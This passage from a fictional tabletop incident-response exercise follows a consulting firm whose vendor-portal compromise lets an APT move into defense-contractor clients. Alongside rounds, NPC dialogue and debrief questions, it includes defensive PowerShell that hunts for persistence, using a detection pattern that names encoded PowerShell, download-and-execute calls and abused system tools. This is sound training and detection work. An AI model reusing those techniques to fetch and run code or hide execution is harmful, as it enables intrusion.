  • Business Impact: Low immediate cost but high risk of clearance suspension and client contract terminations.

Facilitation Questions for Round 2

  • “How does trusted third-party access create unique lateral movement risks in defense contractor environments?”
  • “What are the security clearance implications when a consulting firm’s compromise leads to client classified data theft?”
  • “How should organizations balance business survival with complete threat remediation in national security contexts?”
  • “What makes coordinated multi-organization threat hunting particularly challenging in the defense industrial base?”

Victory Conditions for Lunch & Learn

Technical Victory:

  • Complete removal of persistent adversary access from InnovaTech and confirmed compromised client environments
  • Enhanced monitoring that detects living-off-the-land techniques (abuse of PowerShell, WMI, scheduled tasks, and cloud administration tools) by behavior rather than by signature
  • Coordinated threat intelligence sharing with defense industrial base security community

Business Victory:

  • Security clearances maintained through demonstrated complete threat remediation
  • Critical defense contractor relationships preserved through transparent communication and proactive security response
  • Government consulting business continuity through federal coordination and compliance demonstration

Learning Victory:

  • Team understands advanced persistent threat techniques including living-off-the-land and cloud service abuse
  • Participants recognize trusted third-party risks and lateral movement through consulting relationships
  • Group demonstrates incident response coordinating with federal investigators, defense contractors, and security clearance authorities

Debrief Topics

  1. Living-Off-The-Land Techniques: How do attackers abuse legitimate administrative tools to evade detection?
  2. Trusted Third-Party Risk: What makes vendor and consulting firm compromises particularly dangerous for clients?
  3. Security Clearance Obligations: How do federal security clearance requirements affect incident response for government contractors?
  4. Lateral Movement Detection: What behavioral indicators reveal movement through trusted relationships?
  5. Federal Coordination: How should organizations coordinate with the FBI, the Defense Security Service (since 2019 the Defense Counterintelligence and Security Agency, DCSA), and affected clients?
  6. Business Continuity Balance: When do security clearance obligations require prioritizing complete remediation over business survival?

Full Game Materials (120-140 min, 3 rounds)

Round 1: Initial APT Discovery & Vendor Portal Compromise (35-40 min)

Open Investigation (Player-Driven)

Available Evidence (Players must ask to investigate):

  • Email logs: Show vendor portal password reset requests with suspicious timing
  • Network traffic: Reveals persistent connections to cloud services with unusual data volumes
  • Endpoint forensics: Modified PowerShell execution policies and permanent WMI event subscriptions
  • Client communications: Recent questions about InnovaTech access during non-business hours
  • Vendor portal logs: Multiple successful authentications from unusual geographic locations
  • Cloud service audit logs: Administrative actions that don’t match employee schedules
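The last two evidence items (portal authentications from unusual locations, cloud administrative actions that do not match employee schedules) are the kind of thing a Tracker would test with a script rather than by eye. The following is an added example, not part of the scenario materials: it runs over constructed vendor-portal and cloud audit records, checks each against an assumed per-user baseline (home country, working window in UTC), and correlates the two anomaly types per user. User names, countries, field names, the working hours, and the list of privileged actions are all assumptions for illustration.

```powershell
# Added example for this scenario, not part of the original materials.
# All records below are CONSTRUCTED for illustration; user names, countries,
# field names, working hours and the privileged-action list are assumptions.

# Vendor portal authentications (UTC). RO stands in for the "unusual
# geographic location" the players are meant to notice.
$portalAuth = @'
Timestamp,User,SourceCountry,Result
2024-03-04T14:02:11Z,m.chen,US,Success
2024-03-04T22:41:09Z,m.chen,US,Success
2024-03-05T03:17:45Z,m.chen,RO,Success
2024-03-05T03:19:02Z,j.torres,RO,Success
2024-03-05T14:05:30Z,j.torres,US,Success
'@ | ConvertFrom-Csv

# Cloud audit events (Azure AD and AWS CloudTrail style, normalised to one shape).
$cloudAudit = @'
Timestamp,Actor,Action,Service
2024-03-04T15:10:00Z,m.chen,Add member to role,AzureAD
2024-03-05T02:55:12Z,m.chen,Add service principal credential,AzureAD
2024-03-05T03:30:44Z,m.chen,CreateAccessKey,AWS
2024-03-05T16:20:00Z,r.park,DescribeInstances,AWS
'@ | ConvertFrom-Csv

# Per-user baseline: countries the user normally authenticates from and the
# UTC hours covering their working day (assumed 13:00-23:00 UTC for a US
# Eastern team). A real baseline is learned from 60-90 days of logs.
$baseline = @{
    'm.chen'   = @{ Countries = @('US'); StartHour = 13; EndHour = 23 }
    'j.torres' = @{ Countries = @('US'); StartHour = 13; EndHour = 23 }
    'r.park'   = @{ Countries = @('US'); StartHour = 13; EndHour = 23 }
}

# Actions that grant or create credentials/privilege; off-schedule
# occurrences of these are escalated.
$privileged = 'Add member to role', 'Add service principal credential', 'CreateAccessKey'

function Test-OffHours {
    param([datetime]$TimeUtc, [int]$StartHour, [int]$EndHour)
    return ($TimeUtc.Hour -lt $StartHour -or $TimeUtc.Hour -ge $EndHour)
}

function Find-UnusualGeo {
    # Successful portal logins from a country outside the user's baseline.
    foreach ($e in $portalAuth) {
        $b = $baseline[$e.User]
        if ($b -and $e.Result -eq 'Success' -and $e.SourceCountry -notin $b.Countries) {
            [pscustomobject]@{ Finding = 'UnusualGeo'; Time = $e.Timestamp; User = $e.User
                               Detail = "portal login from $($e.SourceCountry)" }
        }
    }
}

function Find-OffSchedulePrivileged {
    # Privileged cloud actions outside the actor's working window.
    foreach ($e in $cloudAudit) {
        $b = $baseline[$e.Actor]
        $t = [datetime]::Parse($e.Timestamp).ToUniversalTime()
        if ($b -and $e.Action -in $privileged -and (Test-OffHours $t $b.StartHour $b.EndHour)) {
            [pscustomobject]@{ Finding = 'OffSchedulePrivileged'; Time = $e.Timestamp; User = $e.Actor
                               Detail = "$($e.Service): $($e.Action)" }
        }
    }
}

# Correlate: a user with BOTH an unusual-geo portal login and an off-schedule
# privileged cloud action is the lead to chase first; either alone may be a
# travelling employee or an on-call change (the red herrings in this scenario).
$hits = @(Find-UnusualGeo) + @(Find-OffSchedulePrivileged)
$hits | Sort-Object Time | Format-Table -AutoSize

$hits | Group-Object User | Where-Object {
    @($_.Group.Finding | Sort-Object -Unique).Count -eq 2
} | ForEach-Object { "Correlated: $($_.Name) ($($_.Count) findings)" }
```

The design point is the correlation step: in a consulting firm whose staff travel and administer client clouds at odd hours, a single off-hours or foreign login is noise, while the same identity producing a foreign portal login and a credential-creating cloud action inside the same window is the signal. Replace the inline CSV with exports from the portal provider and from Azure AD sign-in / CloudTrail logs, and note that the 6-week log gap introduced later in the advanced track would simply leave those rows absent rather than flagged.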

Role-Specific Investigation Paths:

  • Detective: Can pursue digital forensics, malware analysis, vendor portal compromise timeline, or email attack vectors
  • Protector: Can investigate endpoint security, network segmentation, client environment assessment, or access control analysis
  • Tracker: Can analyze command and control infrastructure, cloud service abuse patterns, adversary tradecraft, or attribution indicators
  • Communicator: Can interview employees about suspicious emails, coordinate with vendor portal provider, assess federal notification requirements, or evaluate client communication strategy

NPC Interactions (Players must initiate)

Security Director Amanda Foster (Former NSA):

  • Available for federal coordination guidance, security clearance implications, threat hunting strategy
  • If asked about federal requirements: “Given our classified project involvement, we have mandatory reporting obligations to Defense Security Service within 72 hours of confirmed compromise. Any delay could jeopardize our clearances.”
  • If asked about business impact: “We have $45 million in active government contracts. Security clearance suspension would essentially end our government consulting business. But national security comes first.”

Principal Consultant Michael Chen (Cloud Architecture):

  • Available for cloud service analysis, legitimate tool identification, client environment assessment
  • If asked about cloud activity: “These administrative actions look legitimate on the surface - Azure AD management, AWS resource monitoring. But the timing and data volumes don’t match our actual operations. Someone’s using our cloud infrastructure for cover.”
  • If asked about client impact: “We have administrative access to six defense contractor client networks for security consulting. If attackers got our credentials, they could have moved laterally to classified environments.”

Compliance Manager Jennifer Torres (Security Clearances):

  • Available for federal reporting requirements, security clearance obligations, client notification protocols
  • If asked about notification timing: “Defense Security Service requires notification within 72 hours, but FBI counterintelligence may want us to delay client notification for investigation purposes. We’re in a complex regulatory position.”
  • If asked about clearance risk: “If federal investigators determine we had inadequate security for classified data access, every employee with a clearance could face suspension or revocation. That’s our entire senior consulting staff.”

Lead Engineer Ryan Park (Threat Hunting):

  • Available for technical analysis, detection methodology, persistence mechanism identification
  • If asked about detection challenges: “Living-off-the-land techniques are designed to blend with legitimate operations. They’re using PowerShell, WMI, and cloud services we use every day. Traditional signature-based detection is useless here.”
  • If asked about scope assessment: “Based on the persistence mechanisms I’m finding, attackers have been here for months. They’ve had time to exfiltrate everything - client data, classified projects, intellectual property.”

Pressure Events (Timed Throughout Round)

T+10: Defense contractor client emails asking why InnovaTech credentials accessed their classified network at 3 AM last Tuesday. They’re requesting immediate explanation.

T+20: Vendor portal provider confirms unauthorized access to InnovaTech account credentials three months ago. They ask if InnovaTech wants to file law enforcement report.

T+30: IT monitoring detects active data exfiltration to a cloud storage service. Someone is stealing data right now, in real time.

Round 1 Response Development

Players must develop response addressing:

  • Immediate containment: How to stop active data exfiltration without alerting attackers
  • Federal notification: When and how to notify Defense Security Service and FBI
  • Client communication: What to tell defense contractor clients and when
  • Scope assessment: How to determine full extent of compromise across consulting firm and client environments
  • Business continuity: How to maintain government consulting operations during investigation

No pre-defined options - players must justify their approach

Round 1 Transition (Based on Player Decisions)

IM evaluates player response and introduces consequences:

  • If federal notification delayed: Defense Security Service discovers compromise independently, questions clearance eligibility
  • If immediate client notification: Some clients terminate contracts, others demand on-site remediation
  • If containment inadequate: Attackers detect investigation and establish additional backup persistence
  • If scope assessment incomplete: Round 2 reveals client lateral movement was worse than initially assessed

Round 2: Client Lateral Movement & Classified Data Theft (40-45 min)

Evolving Situation (Based on Round 1)

New Evidence Available:

  • Complete vendor portal compromise timeline showing three-month adversary presence
  • Client network logs revealing lateral movement through InnovaTech trusted access
  • Classified project data found on foreign intelligence infrastructure (from FBI counterintelligence)
  • Defense Security Service formal investigation notice regarding security clearance review
  • Additional defense contractor clients reporting suspicious InnovaTech access patterns

Escalating Pressure:

  • Business Crisis: Three major clients suspend contracts pending investigation ($18M annual revenue)
  • Federal Investigation: FBI counterintelligence treating case as potential espionage affecting national security
  • Security Clearance: Defense Security Service reviewing clearance eligibility for all InnovaTech personnel with classified access
  • Technical Challenge: Attackers established sophisticated persistence across six different client environments

Open Investigation Continues

Additional Investigation Paths:

  • Client Environment Forensics: Assess lateral movement extent and data theft across six defense contractor networks
  • Attribution Analysis: Determine adversary capabilities, motivations, and potential nation-state sponsorship
  • Persistence Mechanisms: Identify all backup access methods and hidden persistence techniques
  • Data Exfiltration Analysis: Determine what classified information was stolen and from which clients

NPC Developments

Security Director Foster - Federal Coordination Crisis:

  • “FBI counterintelligence wants us to delay comprehensive client notification to preserve investigation. But Defense Security Service says we’re violating clearance obligations by not immediately disclosing to all affected clients. I need guidance on how to navigate conflicting federal requirements.”

Principal Consultant Chen - Client Remediation Complexity:

  • “Each defense contractor client has different security requirements, operational constraints, and remediation expectations. Some want us on-site immediately, others won’t give us access until federal investigation completes. Coordinating synchronized threat hunting across six different organizations is nearly impossible.”

Compliance Manager Torres - Clearance Suspension Imminent:

  • “Defense Security Service just sent formal notice: Unless we demonstrate complete adversary removal and enhanced security controls within 48 hours, they’re suspending all classified access for InnovaTech personnel. That would effectively end our government business.”

Lead Engineer Park - Persistence Sophistication:

  • “These attackers anticipated detection. They established multiple backup persistence mechanisms across client environments - WMI event subscriptions, scheduled tasks, modified legitimate tools. Removing them requires coordinating with each client’s security team to avoid disrupting their operations.”
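Park's list (WMI event subscriptions, scheduled tasks, modified legitimate tools) together with the Round 1 endpoint evidence (modified PowerShell execution policies, WMI subscriptions) is concrete enough to hunt for with a script. The following is an added example, not part of the scenario materials or any tool the scenario names: a read-only PowerShell hunt for those four mechanisms on one Windows host, producing objects that can be exported as evidence before anything is removed. The WMI/CIM class names and cmdlets are real; the living-off-the-land binary list, the command-line regex, and the set of system tools checked are assumptions to tune per client environment.

```powershell
# Added example for this scenario, not part of the original materials.
# Read-only hunt for the persistence mechanisms Park describes; run elevated on
# one Windows host. WMI/CIM class names and cmdlets are real; the binary list,
# the regex and the tool list are assumptions to tune per client environment.

function Get-WmiPersistence {
    # Permanent WMI event subscriptions survive reboots and execute as SYSTEM.
    # A filter bound to a CommandLine or ActiveScript consumer is the pattern
    # to flag; legitimate software rarely needs one.
    $ns = 'root\subscription'
    $filters   = @(Get-CimInstance -Namespace $ns -ClassName __EventFilter)
    $consumers = @(Get-CimInstance -Namespace $ns -ClassName __EventConsumer)
    foreach ($b in Get-CimInstance -Namespace $ns -ClassName __FilterToConsumerBinding) {
        # Binding references carry only the key (Name). Get-WmiObject returns
        # them as strings, Get-CimInstance as instances, so handle both.
        $fName = if ($b.Filter   -is [string]) { ($b.Filter   -split '"')[1] } else { $b.Filter.Name }
        $cName = if ($b.Consumer -is [string]) { ($b.Consumer -split '"')[1] } else { $b.Consumer.Name }
        $f = $filters   | Where-Object { $_.Name -eq $fName }
        $c = $consumers | Where-Object { $_.Name -eq $cName }
        $class   = $c.CimClass.CimClassName
        $payload = if ($c.CommandLineTemplate) { $c.CommandLineTemplate } else { $c.ScriptText }
        [pscustomobject]@{
            Type       = 'WMISubscription'
            Name       = "$fName -> $cName ($class)"
            Command    = $payload
            Trigger    = $f.Query
            Suspicious = $class -in 'CommandLineEventConsumer', 'ActiveScriptEventConsumer'
        }
    }
}

function Get-SuspiciousScheduledTask {
    # Tasks that launch a scripting host or carry encoded/hidden PowerShell are
    # the scheduled-task flavour of living off the land.
    $lolbins = 'powershell', 'pwsh', 'wscript', 'cscript', 'mshta', 'rundll32',
               'regsvr32', 'cmd', 'wmic', 'certutil', 'bitsadmin', 'msiexec'
    $pattern = '(?i)-e(nc|ncodedcommand)?\s|-w(indowstyle)?\s+hidden|-nop\b|bypass|\biex\b|downloadstring|frombase64string'
    foreach ($t in Get-ScheduledTask) {
        foreach ($a in $t.Actions) {
            if (-not $a.Execute) { continue }            # COM-handler actions have no Execute
            $exe = [IO.Path]::GetFileNameWithoutExtension($a.Execute.Trim('"'))
            $cmd = "$($a.Execute) $($a.Arguments)".Trim()
            if ($exe -in $lolbins -or $cmd -match $pattern) {
                [pscustomobject]@{
                    Type       = 'ScheduledTask'
                    Name       = "$($t.TaskPath)$($t.TaskName) (author: $($t.Author); runs as: $($t.Principal.UserId))"
                    Command    = $cmd
                    Trigger    = ($t.Triggers | ForEach-Object { $_.CimClass.CimClassName }) -join ','
                    Suspicious = $true
                }
            }
        }
    }
}

function Get-ExecutionPolicyChange {
    # "Modified PowerShell execution policies": a scope set to Bypass or
    # Unrestricted removes the (weak) friction against script execution.
    foreach ($p in Get-ExecutionPolicy -List) {
        if ($p.ExecutionPolicy -in 'Bypass', 'Unrestricted') {
            [pscustomobject]@{ Type = 'ExecutionPolicy'; Name = $p.Scope; Command = "$($p.ExecutionPolicy)"; Trigger = ''; Suspicious = $true }
        }
    }
}

function Get-TamperedSystemTool {
    # "Modified legitimate tools": a Microsoft binary whose signature no longer
    # validates has been altered on disk. Catalog-signed files report NotSigned
    # only when the catalog itself is damaged; confirm with a known-good hash.
    foreach ($name in 'powershell.exe', 'wmic.exe', 'schtasks.exe', 'certutil.exe', 'rundll32.exe') {
        $path = Join-Path $env:SystemRoot "System32\$name"
        if (-not (Test-Path $path)) { continue }
        $sig = Get-AuthenticodeSignature -FilePath $path
        if ($sig.Status -ne 'Valid') {
            [pscustomobject]@{ Type = 'TamperedBinary'; Name = $path; Command = "$($sig.Status)"; Trigger = (Get-FileHash $path).Hash; Suspicious = $true }
        }
    }
}

# Collect everything as objects so the result can be exported as evidence for
# the client and for federal investigators; nothing here changes the host.
$findings = @(Get-WmiPersistence) + @(Get-SuspiciousScheduledTask) +
            @(Get-ExecutionPolicyChange) + @(Get-TamperedSystemTool)
$findings | Export-Csv -NoTypeInformation -Path ".\persistence-$env:COMPUTERNAME.csv"
$findings | Where-Object Suspicious | Format-Table Type, Name, Command -Wrap
```

Two practitioner notes follow from Park's point about coordination. First, the script deliberately stops at enumeration: removal (Remove-CimInstance on the binding, filter and consumer; Unregister-ScheduledTask; restoring a tampered binary) happens only after the CSV and a memory image are captured and the client's security team has approved the change window, because pulling one mechanism tips the adversary to fall back to the next. Second, run it per host across the estate and diff the results against a clean build of the same image; a WMI subscription or task that exists on every host is configuration management, one that exists on three domain controllers and a consultant's jump box is the finding.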

Pressure Events Round 2

T+10: Major defense contractor discovers classified weapons system designs on foreign intelligence network. Their forensics confirms exfiltration through InnovaTech compromise. They’re threatening legal action.

T+25: Defense Security Service accelerates clearance review timeline. They want evidence of complete threat remediation within 24 hours, not 48.

T+35: Two additional defense contractor clients independently discover suspicious InnovaTech access patterns. They’re demanding immediate explanation and threatening contract termination.

Round 2 Response Development

Players must address:

  • Client Remediation Strategy: How to coordinate threat hunting across six different defense contractor environments
  • Federal Coordination: How to balance FBI investigation preservation with Defense Security Service notification obligations
  • Security Clearance Demonstration: What evidence will prove complete threat remediation to federal investigators
  • Business Survival: How to maintain government consulting operations while addressing multi-client breach
  • Resource Allocation: Limited threat hunting resources across multiple client environments with competing demands

Round 2 Transition

IM evaluates client remediation strategy and introduces Round 3 setup:

  • Assessment of threat hunting effectiveness across client environments
  • Federal investigator response to coordination approach
  • Security clearance review decision based on demonstrated remediation
  • Client relationship outcomes based on communication and response quality

Round 3: Security Clearance Review & Business Recovery (40-55 min)

Final Crisis Resolution

Situation Status:

  • Federal investigation reaching conclusion - final evidence needed
  • Security clearance decision imminent - demonstration of enhanced security required
  • Client relationships at critical juncture - remediation quality determines future business
  • Adversary persistence status - have all access methods been eliminated?

New Developments:

  • Defense Security Service: Final clearance review hearing scheduled - must demonstrate complete security improvement
  • FBI Counterintelligence: Attribution confirmed as nation-state APT - broader defense industrial base warning needed
  • Client Coordination: Some clients demanding financial compensation, others requesting enhanced security consulting
  • Threat Intelligence: Security community identifies InnovaTech compromise as part of broader defense contractor campaign

Final Investigation & Response

Critical Questions Players Must Answer:

  1. Complete Threat Elimination: How do you verify all adversary persistence removed from consulting firm and client environments?
  2. Enhanced Security Demonstration: What security improvements prove to Defense Security Service that future compromises are prevented?
  3. Client Relationship Recovery: How do you rebuild trust with defense contractor clients after compromising their classified environments?
  4. Business Continuity: What’s the path to maintain government consulting business and security clearances?
  5. Community Coordination: How do you share threat intelligence with broader defense industrial base without damaging reputation?

NPC Final Positions

Security Director Foster - Federal Testimony:

  • “I’m testifying at the clearance review hearing tomorrow. I need to present a complete narrative: how we detected the APT, coordinated with federal investigators, remediated all client environments, and implemented enhanced security. Our government business depends on this testimony being convincing.”

Principal Consultant Chen - Client Recovery Strategy:

  • “Some clients view us as victims of sophisticated nation-state attack. Others see negligent security that compromised their classified projects. We need differentiated strategies for relationship recovery based on each client’s perspective and damage level.”

Compliance Manager Torres - Clearance Decision Framework:

  • “Defense Security Service will base clearance decision on three factors: complete threat remediation, enhanced security controls, and demonstrated commitment to federal coordination. We need concrete evidence for all three, not just promises.”

Lead Engineer Park - Threat Intelligence Sharing:

  • “FBI wants us to share detailed attack indicators with other defense contractors through Defense Industrial Base Collaborative Information Sharing Environment. But some clients worry that publicizing our compromise damages our reputation. How do we balance community security with business interests?”

Final Pressure Events

T+15: Defense Security Service requests final evidence submission for clearance review. They specifically want: complete forensic timeline, all client remediation verification, enhanced security architecture, and future prevention controls.

T+30: Major client that initially threatened legal action approaches with a different proposal: instead of termination, they want InnovaTech to lead an enhanced security consulting engagement for their entire defense contractor network. This could be a path to business recovery or a further reputational risk.

T+40: FBI counterintelligence confirms a broader APT campaign targeting at least twelve other defense consulting firms. An industry coordination meeting is scheduled for tomorrow, and InnovaTech is invited to present lessons learned. This is an opportunity for thought leadership or a public admission of security failures.

Victory Conditions for Full Game

Technical Victory:

  • Complete documented removal of all adversary persistence from InnovaTech and six client environments
  • Enhanced security architecture that detects and constrains living-off-the-land techniques and hardens vendor portal access against credential compromise
  • Threat intelligence contribution to defense industrial base community security

Business Victory:

  • Security clearances maintained through demonstrated federal coordination and security improvement
  • Majority of defense contractor client relationships preserved or recovered
  • Government consulting business continuity with enhanced security positioning

Learning Victory:

  • Team demonstrates sophisticated understanding of APT techniques, living-off-the-land detection, and cloud service abuse
  • Participants navigate complex federal coordination between FBI counterintelligence and Defense Security Service
  • Group balances business survival with national security obligations and client relationship management
  • Understanding of trusted third-party risks and lateral movement through consulting relationships

Debrief Topics

  1. Advanced Persistent Threat Evolution: How have APTs evolved from traditional malware to living-off-the-land techniques?
  2. Cloud Service Security: What makes legitimate cloud service abuse particularly difficult to detect and prevent?
  3. Vendor Portal Risk: Why are third-party portals such attractive targets for supply chain attacks?
  4. Federal Coordination Complexity: How do organizations navigate conflicting requirements from different federal agencies?
  5. Security Clearance Obligations: What are the incident response implications of holding government security clearances?
  6. Trusted Third-Party Lateral Movement: How should consulting firms protect both their own and client environments?
  7. Business Continuity Ethics: When do national security obligations require prioritizing security over business survival?
  8. Threat Intelligence Sharing: How can compromised organizations contribute to community security despite reputational concerns?

Advanced Challenge Materials (150-170 min, 3+ rounds)

Advanced Challenge Modifications

Complexity Additions:

  1. Conflicting Federal Requirements:
    • FBI counterintelligence wants investigation preservation (delay client notification)
    • Defense Security Service demands immediate disclosure (clearance obligations)
    • Players must navigate contradictory federal guidance with incomplete information
  2. Client Environment Diversity:
    • Six different defense contractors with varying security requirements
    • Some allow on-site remediation, others refuse access during federal investigation
    • Different classification levels (CONFIDENTIAL, SECRET, TOP SECRET) require different handling
    • CMMC compliance levels vary across clients, affecting remediation approach
  3. Ambiguous Attribution:
    • Initial indicators suggest criminal espionage, later evidence points to nation-state
    • Some attack patterns match known APT, others appear unique
    • Players must make federal coordination decisions with uncertain attribution
  4. Resource Constraints:
    • Limited threat hunting team can’t simultaneously remediate all six client environments
    • Must prioritize clients based on incomplete damage assessment
    • Some clients demand immediate attention, others are more patient
  5. Red Herrings:
    • Legitimate cloud administrative actions by employees that appear suspicious
    • False positive alerts from security tools due to normal consulting operations
    • Vendor portal access from legitimate third-party integration that appears unauthorized
    • Client network activity from approved penetration testing that mimics lateral movement

Remove Access to Reference Materials:

  • No MITRE ATT&CK framework lookup during gameplay
  • No federal regulation quick-reference guides
  • No pre-defined response templates
  • Players must recall knowledge of:
    • Living-off-the-land techniques and detection methods
    • Federal security clearance notification requirements
    • Defense Security Service clearance review processes
    • APT behavior patterns and persistence mechanisms

Justification Requirements:

Players must provide detailed written justification for:

  • Federal notification timing decisions (with specific regulatory citations from memory)
  • Client prioritization for remediation resources (with risk-based reasoning)
  • Security clearance hearing evidence (demonstrating understanding of federal expectations)
  • Threat intelligence sharing scope (balancing community security with business reputation)

Advanced Challenge Round Structure

Round 1: Ambiguous Initial Discovery (45-50 min)

  • Evidence is intentionally contradictory - some indicators suggest criminal ransomware, others point to APT
  • Legitimate employee cloud actions are mixed with attacker activity
  • Vendor portal compromise timeline is unclear due to log gaps
  • Players must develop investigation strategy with high uncertainty
  • Early decisions about federal notification made with incomplete information

Round 2: Multi-Client Crisis with Resource Constraints (50-55 min)

  • Six client environments need simultaneous remediation
  • Threat hunting team can only address two clients in depth per round
  • Must prioritize based on incomplete damage assessment
  • Federal investigators demanding evidence but some clients won’t provide access
  • Conflicting federal guidance creates no-win notification scenarios

Round 3: Security Clearance Hearing & Attribution Pivot (55-65 min)

  • Initial attribution assessment proves incorrect - must revise federal coordination
  • Defense Security Service clearance hearing requires justifying all previous decisions
  • Some clients independently discover compromise and question notification delays
  • Threat intelligence sharing opportunity conflicts with business reputation management
  • Final decisions about business recovery vs. enhanced security investment

Advanced Pressure Events

T+20 (Round 1): An employee reports receiving a legitimate cloud administration notification that looks identical to the suspicious activity under investigation. How do players differentiate legitimate from malicious?

T+35 (Round 1): Vendor portal provider shares access logs, but a six-week gap exists during the critical compromise period. Players must make the federal notification decision without complete evidence.

T+15 (Round 2): Client A demands immediate on-site remediation. Client B refuses access until FBI completes investigation. Client C wants detailed forensic report before deciding. Threat hunting team can only support one immediately.

T+40 (Round 2): Defense Security Service asks why client notification was delayed (if applicable) or why FBI investigation was compromised by early notification (if applicable). Players must justify decision with regulatory citations.

T+25 (Round 3): Attribution analysis reveals the attack is more sophisticated than initially assessed: nation-state instead of criminal. All previous federal coordination may have involved the wrong agencies. How do players adjust?

T+50 (Round 3): Major client discovers compromise independently through their own threat hunting. They question why InnovaTech didn’t notify them earlier. Must justify notification timeline decisions with incomplete information from earlier rounds.

Advanced Victory Conditions

Technical Victory (High Bar):

  • Complete threat elimination verified through independent third-party assessment
  • Enhanced security architecture addressing living-off-the-land techniques, cloud service abuse, and vendor portal risks
  • Contributed actionable threat intelligence to defense industrial base community
  • Documented lessons learned demonstrating sophisticated APT understanding

Business Victory (High Bar):

  • Security clearances maintained with no suspension period
  • At least 4 of 6 defense contractor client relationships preserved
  • Government consulting business revenue maintained above 80% of pre-incident levels
  • Enhanced security positioning attracts new government clients despite public compromise

Learning Victory (High Bar):

  • Justified all federal notification decisions with specific regulatory requirements (recalled from memory)
  • Demonstrated understanding of conflicting federal agency priorities and navigation strategies
  • Explained living-off-the-land detection challenges and behavioral analysis approaches
  • Articulated trusted third-party risk management and lateral movement prevention
  • Balanced business survival with national security obligations throughout scenario

Advanced Facilitation Challenges

When Players Struggle with Ambiguity:

Don’t resolve uncertainty for them. Instead: “Federal investigators also don’t have complete information yet. How do incident responders make critical decisions with incomplete evidence? What’s your decision framework?”

When Players Request Unavailable Information:

Enforce constraints: “You don’t have access to MITRE ATT&CK lookup right now. Based on your understanding of APT behavior, what techniques would you expect and how would you detect them?”

When Players Avoid Difficult Trade-Offs:

Force decision: “You have one threat hunting team and three clients demanding immediate remediation. Federal investigators need evidence from Client A, but Client B has the most classified data exposure. Client C is threatening contract termination. You must choose - which client gets resources first and why?”

When Players Rely on Pre-Defined Responses:

Remove safety net: “There are no template responses for this situation. You need to develop original strategy addressing: federal coordination, client remediation prioritization, security clearance demonstration, and business continuity. What’s your approach?”

Advanced Debrief Topics

  1. Decision-Making Under Uncertainty: How did incomplete information affect federal notification and client prioritization decisions?
  2. Regulatory Conflict Navigation: What strategies help navigate contradictory requirements from FBI and Defense Security Service?
  3. Living-Off-The-Land Detection: Without reference materials, what APT techniques did you recall and how would you detect them?
  4. Resource Prioritization Ethics: How did you balance competing client demands with limited threat hunting resources?
  5. Attribution Impact: How did changing understanding of adversary (criminal vs. nation-state) affect response strategy?
  6. Security Clearance Demonstration: What evidence convinces federal investigators of complete security improvement?
  7. Trusted Third-Party Responsibility: What are the ethical obligations when consulting firm compromise affects client classified environments?
  8. Business vs. Security Trade-Offs: When should organizations prioritize complete threat remediation over business survival?
  9. Threat Intelligence Sharing: How can compromised organizations contribute to community security despite reputational concerns?
  10. Lessons Learned Application: What specific security improvements would prevent similar vendor portal compromises?